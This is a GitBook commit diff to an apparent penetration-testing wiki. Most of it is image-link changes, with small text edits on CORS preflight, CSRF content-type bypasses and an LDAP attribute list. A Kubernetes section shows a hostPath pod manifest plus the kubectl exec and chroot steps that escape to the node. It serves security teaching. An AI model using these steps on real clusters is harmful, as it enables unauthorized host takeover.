GitBook: [master] 8 pages and 14 assets modified

This commit is contained in:
CPol 2021-05-29 20:00:49 +00:00 committed by gitbook-bot
parent dfca7327db
commit 2f669dffc0
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
15 changed files with 24 additions and 22 deletions

View file

Before

Width:  |  Height:  |  Size: 341 KiB

After

Width:  |  Height:  |  Size: 341 KiB

View file

Before

Width:  |  Height:  |  Size: 341 KiB

After

Width:  |  Height:  |  Size: 341 KiB

View file

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

View file

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

View file

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 18 KiB

View file

Before

Width:  |  Height:  |  Size: 13 KiB

After

Width:  |  Height:  |  Size: 13 KiB

View file

Before

Width:  |  Height:  |  Size: 2.8 KiB

After

Width:  |  Height:  |  Size: 2.8 KiB

View file

@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\): * [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides. * Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
![](../../../.gitbook/assets/image%20%28509%29.png) ![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28512%29.png) ![](../../../.gitbook/assets/image%20%28512%29.png)

View file

@ -32,7 +32,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
``` ```
![](../../../.gitbook/assets/image%20%28495%29%20%281%29.png) ![](../../../.gitbook/assets/image%20%28495%29%20%281%29%20%281%29.png)
### Volume Shadow Copies ### Volume Shadow Copies
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\). Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
![](../../../.gitbook/assets/image%20%28477%29%20%281%29.png) ![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
### USB Detective ### USB Detective

View file

@ -593,7 +593,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
5. Reproduce the problem. 5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](../../.gitbook/assets/image%20%28466%29%20%281%29.png) ![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

View file

@ -89,9 +89,13 @@ Access-Control-Max-Age: 240
![](../.gitbook/assets/preflight.svg) ![](../.gitbook/assets/preflight.svg)
Note that in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it. Note that usually \(depending on the content-type and headers set\) in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.
**Therefore, CORS doesn't protect against CSRF \(but it can be helpful\).** **Therefore, CORS doesn't protect against CSRF \(but it can be helpful\).**
{% hint style="info" %}
**Check** [**in this link**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) **the conditions of a request to avoid sending of a pre-flight request**
{% endhint %}
## Exploitable misconfigurations ## Exploitable misconfigurations
Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself. Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself.

View file

@ -73,7 +73,13 @@ In this situation, the attacker can again perform a CSRF **attack if the web sit
### Content-Type change ### Content-Type change
You can change to POST Content-Type to _**application/json, application/x-url-encoded**_ or _**form-multipart**_ and maybe you will be able to bypass the CSRF token. According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests), n order to **avoid preflight** requests using **POST** method these are the allowed Content-Type values:
* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**
However, note that the **severs logic may vary** depending on the **Content-Type** used so you should try the values mentioned and others like **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
### Referrer / Origin check bypass ### Referrer / Origin check bypass

View file

@ -128,7 +128,7 @@ You can iterate over the ascii letters, digits and symbols:
### **Discover valid LDAP fields** ### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of ****[**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**.** LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
```python ```python
#!/usr/bin/python3 #!/usr/bin/python3

View file

@ -76,11 +76,13 @@ The following `kubectl` commands indicates just how to list the objects. If you
{% endhint %} {% endhint %}
### Using kubectl ### Using kubectl
when using kubectl it might come in handy to define a temporary alias, if the token used is different to the one defined in `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount`. when using kubectl it might come in handy to define a temporary alias, if the token used is different to the one defined in `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount`.
```bash ```bash
alias kubectl='kubectl --token=<jwt_token>' alias kubectl='kubectl --token=<jwt_token>'
``` ```
[kubectl cheatsheet](https://kubernetes.io/docs/reference/kubectl/cheatsheet/) [kubectl cheatsheet](https://kubernetes.io/docs/reference/kubectl/cheatsheet/)
### Get namespaces ### Get namespaces
@ -273,12 +275,10 @@ If you are able to create new pods you might be able to escape from them to the
```bash ```bash
kubectl get pod <name> [-n <namespace>] -o yaml kubectl get pod <name> [-n <namespace>] -o yaml
``` ```
Then you create your attack.yaml file Then you create your attack.yaml file
```yaml ```yaml
apiVersion: v1 apiVersion: v1
kind: Pod kind: Pod
@ -300,35 +300,29 @@ spec:
- name: host-fs - name: host-fs
mountPath: /root mountPath: /root
restartPolicy: Never restartPolicy: Never
``` ```
[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba) [original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
After that you create the pod After that you create the pod
```bash ```bash
kubectl apply -f attacker.yaml [-n <namespace>] kubectl apply -f attacker.yaml [-n <namespace>]
``` ```
Now you can switch to the created pod as follows Now you can switch to the created pod as follows
```bash ```bash
kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file
``` ```
And finally you chroot into the node's system And finally you chroot into the node's system
```bash ```bash
chroot /root /bin/bash chroot /root /bin/bash
``` ```
Information obtained from:\ Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)\
[Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
## Sniffing ## Sniffing

View file

@ -113,5 +113,3 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics. * [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs * [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
##